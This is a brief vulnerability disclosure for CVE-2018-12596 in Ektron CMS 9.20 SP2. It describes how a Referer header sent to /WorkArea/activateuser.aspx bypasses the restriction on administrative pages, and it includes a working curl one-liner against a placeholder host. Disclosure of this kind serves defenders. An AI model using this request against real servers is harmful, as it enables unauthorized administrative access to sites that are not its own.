EpiServer Ektron

Ektron CMS 9.20 SP2 allows remote attackers to call aspx pages via the activateuser.aspx page, even if a page is located under the /WorkArea/ path, which is forbidden and normally available exclusively for local Admins

Exploit

Sending a Referer header to the /WorkArea/activateuser.aspx endpoint, an attacker could access administrative pages.

curl -skH "Referer: TEST;" https://<vulnerable>/WorkArea/activateuser.aspx

Link to CVE-2018–12596